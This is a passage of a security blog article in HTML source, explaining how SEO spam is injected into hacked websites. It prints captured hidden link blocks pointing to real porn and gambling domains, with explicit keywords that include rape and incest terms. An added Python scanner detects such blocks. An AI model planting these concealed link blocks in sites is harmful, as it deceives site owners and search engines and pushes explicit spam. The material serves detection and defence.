  155. <span id="urvanov-syntax-highlighter-68f254acc263d555824858" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-v">div</span><span class="crayon-o">&gt;</span></span></span> section contains a set of links to low-quality pornographic websites along with their keyword-stuffed descriptions. This clearly indicates spam, as the website where we found this block has no relation whatsoever to the type of content being linked to.</p>
  156. <p>Another sign of Black Hat SEO in the example is the attribute
  157. <span id="urvanov-syntax-highlighter-68f254acc263e586918587" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span>. This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use
  158. <span id="urvanov-syntax-highlighter-68f254acc2640909198748" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"nofollow"</span></span></span>, which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.</p>
  159. <p>Thus, the combination of a hidden block (
  160. <span id="urvanov-syntax-highlighter-68f254acc2641719304235" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span>) and a set of external pornographic (in this instance) links with the
  161. <span id="urvanov-syntax-highlighter-68f254acc2642585875620" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span> attribute unequivocally point to an SEO spam injection.</p>
  162. <p>Note that all
  163. <span id="urvanov-syntax-highlighter-68f254acc2643806833762" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-v">div</span><span class="crayon-o">&gt;</span></span></span> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.</p>
  164. <h3 id="example-2">Example 2</h3>
  165. <pre class="urvanov-syntax-highlighter-plain-tag">&lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;سكس انجليز &lt;a href="https://wfporn.com/" target="_self" title="wfporn.com افلام سحاق مترجم"&gt;wfporn.com&lt;/a&gt; سكس كلاسيك مترجم&lt;/div&gt;
  166. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;فيلم سكس &lt;a href="https://www.keep-porn.com/" rel="dofollow" target="_blank"&gt;keep-porn.com&lt;/a&gt; سكس هندى اغتصاب&lt;/div&gt;
  167. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;desi nude tumbler &lt;a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video"&gt;desixxxv.net&lt;/a&gt; kanpur sexy video&lt;/div&gt;
  168. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;www wap sex video com &lt;a href="https://pornorado.mobi" target="_self"&gt;pornorado.mobi&lt;/a&gt; sexy film video mp4&lt;/div&gt;
  169. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;mom yes porn please &lt;a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net"&gt;movsmo.net&lt;/a&gt; yes porn please brazzers&lt;/div&gt;
  170. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;xxx download hd &lt;a href="https://fuxee.mobi" title="fuxee.mobi"&gt;fuxee.mobi&lt;/a&gt; fat woman sex&lt;/div&gt;
  171. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;bangalore xxx &lt;a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com"&gt;bigassporntrends.com&lt;/a&gt; sexy video kashmir&lt;/div&gt;
  172. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;xnxx sister sex &lt;a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming"&gt;wetwap.info&lt;/a&gt; blue film a video&lt;/div&gt;
  173. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;tamilschoolsexvideo &lt;a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi"&gt;tubetria.mobi&lt;/a&gt; sex free videos&lt;/div&gt;
  174. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;سكس من اجل المال مترجم &lt;a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد لحس الكس"&gt;yesexyporn.com&lt;/a&gt; نسوان شرميط&lt;/div&gt;
  175. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;kamapishi &lt;a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online"&gt;desisexy.org&lt;/a&gt; savita bhabhi xvideo&lt;/div&gt;
  176. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;aflamk2 &lt;a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net"&gt;pornvideoswatch.net&lt;/a&gt; نيك ثمينات&lt;/div&gt;
  177. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;hentaifox futanari &lt;a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame"&gt;hentaitale.net&lt;/a&gt; hen hentai&lt;/div&gt;
  178. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;video sexy wallpaper &lt;a href="https://povporntrends.com" target="_blank"&gt;povporntrends.com&lt;/a&gt; bengolibf&lt;/div&gt;
  179. &lt;div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"&gt;persona 5 hentai manga &lt;a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai"&gt;younghentai.net&lt;/a&gt; toys hentai&lt;/div&gt;</pre>
  180. <p>This example demonstrates a slightly more sophisticated approach to hiding the block containing Black Hat SEO content. It suggests an attempt to bypass the automated search engine filters that easily detect the
  181. <span id="urvanov-syntax-highlighter-68f254acc2646705335060" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span> parameter.</p>
  182. <p>Let us analyze the set of CSS styles:
  183. <span id="urvanov-syntax-highlighter-68f254acc2647754305574" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-e">div </span><span class="crayon-v">style</span><span class="crayon-o">=</span><span class="crayon-s">"overflow: auto; position: absolute; height: 0pt; width: 0pt;"</span><span class="crayon-o">&gt;</span></span></span>. The properties position:
  184. <span id="urvanov-syntax-highlighter-68f254acc2648758738924" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">absolute</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0pt</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0pt</span><span class="crayon-sy">;</span></span></span> remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the <a href="https://en.wikipedia.org/wiki/Document_Object_Model" target="_blank" rel="noopener">DOM (document object model)</a>. That&#8217;s why HTML code scanning systems, such as search engines, are able to see it.</p>
  185. <p>In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute
  186. <span id="urvanov-syntax-highlighter-68f254acc264a594808728" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span>, as well as many links to pornographic websites with relevant keywords.</p>
  187. <p>The combination of styles that sets the block dimensions to zero is less obvious than
  188. <span id="urvanov-syntax-highlighter-68f254acc264b328840541" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span> because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:</p><pre class="urvanov-syntax-highlighter-plain-tag">&lt;script src="files/layout/js/slider3d.js?v=0d6651e2"&gt;&lt;/script&gt;&lt;script src="files/layout/js/layout.js?v=51a52ad1"&gt;&lt;/script&gt;
  189. &lt;style type="text/css"&gt;.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar {  display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}&lt;/style&gt;
  190. &lt;div class="ads-gold"&gt;
  191. Ganhe Rápido nos Jogos Populares do Cassino Online &lt;a href="https://580-bet.com" target="_blank"&gt;580bet&lt;/a&gt;
  192. Cassino &lt;a href="https://bet-7k.com" target="_blank"&gt;bet 7k&lt;/a&gt;: Diversão e Grandes Vitórias Esperam por Você
  193. Aposte e Vença no Cassino &lt;a href="https://leao-88.com" target="_blank"&gt;leao&lt;/a&gt; – Jogos Fáceis e Populares
  194. Jogos Populares e Grandes Prêmios no Cassino Online &lt;a href="https://luck-2.com" target="_blank"&gt;luck 2&lt;/a&gt;
  195. Descubra os Jogos Mais Populares no Cassino &lt;a href="https://john-bet.com" target="_blank"&gt;john bet&lt;/a&gt; e Ganhe
  196. &lt;a href="https://7755-bet.com" target="_blank"&gt;7755 bet&lt;/a&gt;: Apostas Fáceis, Grandes Oportunidades de Vitória
  197. Jogue no Cassino Online &lt;a href="https://cbet-88.com" target="_blank"&gt;cbet&lt;/a&gt; e Aumente suas Chances de Ganhar
  198. Ganhe Prêmios Incríveis com Jogos Populares no Cassino &lt;a href="https://bet7-88.com" target="_blank"&gt;bet7&lt;/a&gt;
  199. Cassino &lt;a href="https://pk55-88.com" target="_blank"&gt;pk55&lt;/a&gt;: Onde a Sorte Está ao Seu Lado
  200. Experimente o Cassino &lt;a href="https://8800-bet.com" target="_blank"&gt;8800 bet&lt;/a&gt; e Ganhe com Jogos Populares
  201. Ganhe Facilmente no Cassino Online &lt;a href="https://doce-88.com" target="_blank"&gt;doce&lt;/a&gt;
  202. Aposte e Vença no Cassino &lt;a href="https://bet-4-br.com" target="_blank"&gt;bet 4&lt;/a&gt;
  203. Jogos Populares e Grandes Premiações na &lt;a href="https://f12--bet.com" target="_blank"&gt;f12bet&lt;/a&gt;
  204. Descubra a Diversão e Vitória no Cassino &lt;a href="https://bet-7-br.com" target="_blank"&gt;bet7&lt;/a&gt;
  205. Aposte nos Jogos Mais Populares do Cassino &lt;a href="https://ggbet-88.com" target="_blank"&gt;ggbet&lt;/a&gt;
  206. Ganhe Prêmios Rápidos no Cassino Online &lt;a href="https://bet77-88.com" target="_blank"&gt;bet77&lt;/a&gt;
  207. Jogos Fáceis e Rápidos no Cassino &lt;a href="https://mrbet-88.com" target="_blank"&gt;mrbet&lt;/a&gt;
  208. Jogue e Ganhe com Facilidade no Cassino &lt;a href="https://bet61-88.com" target="_blank"&gt;bet61&lt;/a&gt;
  209. Cassino &lt;a href="https://tvbet-88.com" target="_blank"&gt;tvbet&lt;/a&gt;: Onde a Sorte Está Ao Seu Lado
  210. Aposte nos Melhores Jogos do Cassino Online &lt;a href="https://pgwin-88.com" target="_blank"&gt;pgwin&lt;/a&gt;
  211. Ganhe Grande no Cassino &lt;a href="https://today-88.com" target="_blank"&gt;today&lt;/a&gt; com Jogos Populares
  212. Cassino &lt;a href="https://fuwin-88.com" target="_blank"&gt;fuwin&lt;/a&gt;: Grandes Vitórias Esperam por Você
  213. Experimente os Melhores Jogos no Cassino &lt;a href="https://brwin-88.com" target="_blank"&gt;brwin&lt;/a&gt;
  214. &lt;/div&gt;&lt;/body&gt;</pre><p>
  215. Aside from the parameters we are already familiar with, which are responsible for concealing a block (
  216. <span id="urvanov-syntax-highlighter-68f254acc264d089610953" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">height</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0px</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">color</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">transparent</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">overflow</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span></span></span>), and the name that hints at its contents (
  217. <span id="urvanov-syntax-highlighter-68f254acc264f657409125" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-e">style </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"text/css"</span><span class="crayon-o">&gt;</span><span class="crayon-sy">.</span><span class="crayon-v">ads</span><span class="crayon-o">-</span><span class="crayon-v">gold</span></span></span>), this example also contains script tags at its very beginning:
  218. <span id="urvanov-syntax-highlighter-68f254acc2650588207053" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-ta">&lt;script </span><span class="crayon-e ">src</span><span class="crayon-o">=</span><span class="crayon-s">"files/layout/js/slider3d.js?v=0d6651e2"</span><span class="crayon-o">&gt;</span><span class="crayon-ta">&lt;/script&gt;</span></span></span> and
  219. <span id="urvanov-syntax-highlighter-68f254acc2651392159977" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-ta">&lt;script </span><span class="crayon-e ">src</span><span class="crayon-o">=</span><span class="crayon-s">"files/layout/js/layout.js?v=51a52ad1"</span><span class="crayon-o">&gt;</span><span class="crayon-ta">&lt;/script&gt;</span></span></span>. These indicate that external JavaScript can dynamically control the page content, for example, by adding or changing hidden links, that is, modifying this block in real time.</p>
  220. <p>This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.</p>
  221. <p>Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:</p>
  222. <ul>
  223. <li>the parameter
  224. <span id="urvanov-syntax-highlighter-68f254acc2653397563196" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">visibility</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span><span class="crayon-sy">;</span></span></span> can sometimes be seen instead of
  225. <span id="urvanov-syntax-highlighter-68f254acc2654921412155" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span>.</li>
  226. <li>Combined with
  227. <span id="urvanov-syntax-highlighter-68f254acc2655758106867" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">position</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">absolute</span><span class="crayon-sy">;</span></span></span>, the block with hidden links may not have a zero size, but rather be located far beyond the visible area of the page. This can be set, for example, via the property
  228. <span id="urvanov-syntax-highlighter-68f254acc2656635163430" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">left</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-cn">9232px</span><span class="crayon-sy">;</span></span></span>, as in the example below.</li>
  229. </ul>
  230. <pre class="urvanov-syntax-highlighter-plain-tag">&lt;div style="position: absolute; left: -9232px"&gt;
  231. &lt;a href="https://romabet.cam/"&gt;روما بت&lt;/a&gt;&lt;br&gt;
  232. &lt;a href="https://mahbet.cam/"&gt;ماه بت&lt;/a&gt;&lt;br&gt;
  233. &lt;a href="https://pinbahis.com.co/"&gt;پین باهیس&lt;/a&gt;&lt;br&gt;
  234. &lt;a href="https://bettingmagazine.org/"&gt;بهترین سایت شرط بندی&lt;/a&gt;&lt;br&gt;
  235. &lt;a href="https://1betcart.com/"&gt;بت کارت&lt;/a&gt;&lt;br&gt;
  236. &lt;a href="https:// yasbet.com.co/"&gt;یاس بت&lt;/a&gt;&lt;br&gt;
  237. &lt;a href="https://yekbet.cam/"&gt;یک بت&lt;/a&gt;&lt;br&gt;
  238. &lt;a href="https://megapari.cam/"&gt;مگاپاری &lt;/a&gt;&lt;br&gt;
  239. &lt;a href="https://onjabet.net/"&gt;اونجا بت&lt;/a&gt;&lt;br&gt;
  240. &lt;a href="https://alvinbet.org/"&gt;alvinbet.org&lt;/a&gt;&lt;br&gt;
  241. &lt;a href="https://2betboro.com/"&gt;بت برو&lt;/a&gt;&lt;br&gt;
  242. &lt;a href="https://betfa.cam/"&gt;بت فا&lt;/a&gt;&lt;br&gt;
  243. &lt;a href="https://betforward.help/"&gt;بت فوروارد&lt;/a&gt;&lt;br&gt;
  244. &lt;a href="https://1xbete.org/"&gt;وان ایکس بت&lt;/a&gt;&lt;br&gt;
  245. &lt;a href="https://1win-giris.com.co/"&gt;1win giriş&lt;/a&gt;&lt;br&gt;
  246. &lt;a href="https://betwiner.org/"&gt;بت وینر&lt;/a&gt;&lt;br&gt;
  247. &lt;a href="https://4shart.com/"&gt;بهترین سایت شرط بندی ایرانی&lt;/a&gt;&lt;br&gt;
  248. &lt;a href="https://1xbetgiris.cam"&gt;1xbet giriş&lt;/a&gt;&lt;br&gt;
  249. &lt;a href="https://1kickbet1.com/"&gt;وان کیک بت&lt;/a&gt;&lt;br&gt;
  250. &lt;a href="https://winbet-bet.com/"&gt;وین بت&lt;/a&gt;&lt;br&gt;
  251. &lt;a href="https://ritzobet.org/"&gt;ریتزو بت&lt;/a&gt;&lt;br&gt;</pre>
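<p>To make the indicators from the examples above usable on the defender's side, here is an added detection script; it is not code from the original article, and the sample page, the class name and the placeholder domains in it are constructed. It parses a page with Python's standard-library HTML parser, collects hiding rules from both inline <code>style</code> attributes and plain <code>.class {...}</code> rules inside <code>&lt;style&gt;</code> blocks, and reports every outbound link that sits inside a hidden element together with the reasons and whether it carries <code>rel="dofollow"</code>. It goes slightly beyond the cases on the page by also treating large negative <code>margin</code> and <code>text-indent</code> offsets as off-screen placement; the regular expressions and the offset threshold are assumptions.</p>

```python
"""Heuristic scanner for hidden SEO link blocks (added example, constructed sample data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS patterns that take an element out of view. Thresholds (e.g. -100px) are assumptions.
HIDING_RULES = {
    "display_none": re.compile(r"display\s*:\s*none", re.I),
    "visibility_hidden": re.compile(r"visibility\s*:\s*hidden", re.I),
    "zero_size": re.compile(
        r"(?:height|width)\s*:\s*0+(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|!|$)", re.I),
    "offscreen": re.compile(
        r"(?:left|top|right|bottom|margin-left|margin-top|text-indent)\s*:\s*-\d{3,}", re.I),
    "transparent_text": re.compile(r"color\s*:\s*transparent", re.I),
}
# Elements that never get a closing tag; they must not be pushed on the element stack.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}
STYLE_BLOCK = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
CLASS_RULE = re.compile(r"\.([A-Za-z0-9_-]+)\s*\{([^}]*)\}")


def matching_rules(css):
    # Names of HIDING_RULES whose pattern occurs in a string of CSS declarations.
    return {name for name, rx in HIDING_RULES.items() if rx.search(css)}


def class_styles(html):
    """Map class name -> concatenated declarations of every plain `.class {...}` rule."""
    styles = {}
    for block in STYLE_BLOCK.findall(html):
        for cls, decl in CLASS_RULE.findall(block):
            styles[cls] = styles.get(cls, "") + decl.strip() + ";"
    return styles


class HiddenLinkScanner(HTMLParser):
    def __init__(self, site_host, styles):
        super().__init__()
        self.site_host = site_host.lower()
        self.styles = styles
        self.stack = []      # (tag, reasons) per open element; reasons inherit from ancestors
        self.findings = []

    def _inspect(self, tag, attrs):
        reasons = set(self.stack[-1][1]) if self.stack else set()
        reasons |= matching_rules(attrs.get("style") or "")
        for cls in (attrs.get("class") or "").split():
            reasons |= matching_rules(self.styles.get(cls, ""))
        if tag == "a" and reasons:
            href = attrs.get("href") or ""
            host = urlparse(href).netloc.lower()
            # Hidden internal links (collapsed menus) are common and benign; only outbound ones count.
            if host and host != self.site_host:
                self.findings.append({
                    "href": href,
                    "reasons": sorted(reasons),
                    "dofollow": (attrs.get("rel") or "").lower() == "dofollow",
                })
        return reasons

    def handle_starttag(self, tag, attrs):
        reasons = self._inspect(tag, dict(attrs))
        if tag not in VOID:
            self.stack.append((tag, reasons))

    def handle_startendtag(self, tag, attrs):
        self._inspect(tag, dict(attrs))   # self-closing tag: nothing to push or pop

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):   # tolerate unclosed elements
            if self.stack[i][0] == tag:
                del self.stack[i:]
                return


def scan(html, site_host):
    # Return one finding per outbound link placed inside a hidden element, in document order.
    parser = HiddenLinkScanner(site_host, class_styles(html))
    parser.feed(html)
    return parser.findings


# Constructed sample reproducing the hiding techniques discussed (placeholder domains).
SAMPLE_HTML = """<html><head><style type="text/css">
.ads-gold {height: 280px;overflow: auto;color: transparent;}
.ads-gold::-webkit-scrollbar { display: none;}
.ads-gold {height: 0px;overflow: hidden;}
</style></head><body>
<p>Visible text with a normal outbound link to <a href="https://partner.example/">a partner</a>.</p>
<nav style="display: none;"><a href="/about">About</a></nav>
<div style="display: none;">stuffed keywords <a href="https://promo-a.example/" rel="dofollow">promo-a</a></div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">more keywords
<a href="https://promo-b.example/" target="_self">promo-b</a></div>
<div style="position: absolute; left: -9232px"><a href="https://promo-c.example/">promo-c</a><br>
<a href="https://promo-c.example/other">promo-c again</a></div>
<div class="ads-gold">Casino text <a href="https://promo-d.example/" target="_blank">promo-d</a></div>
</body></html>"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_HTML, "victim-site.example"):
        print(hit["href"], hit["reasons"], "dofollow" if hit["dofollow"] else "")
```

<p>Run it against a saved copy of a page (fetched the same way a crawler would, since the script cannot see what JavaScript adds later) with the site's own host name, so that hidden internal links such as collapsed menus are ignored. Every hit still deserves a manual look: screen-reader-only text and lazily revealed widgets use some of the same CSS, so the output is a shortlist, not a verdict.</p>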
  252. <h2 id="how-attackers-place-hidden-links-on-other-peoples-websites">How attackers place hidden links on other people&#8217;s websites</h2>
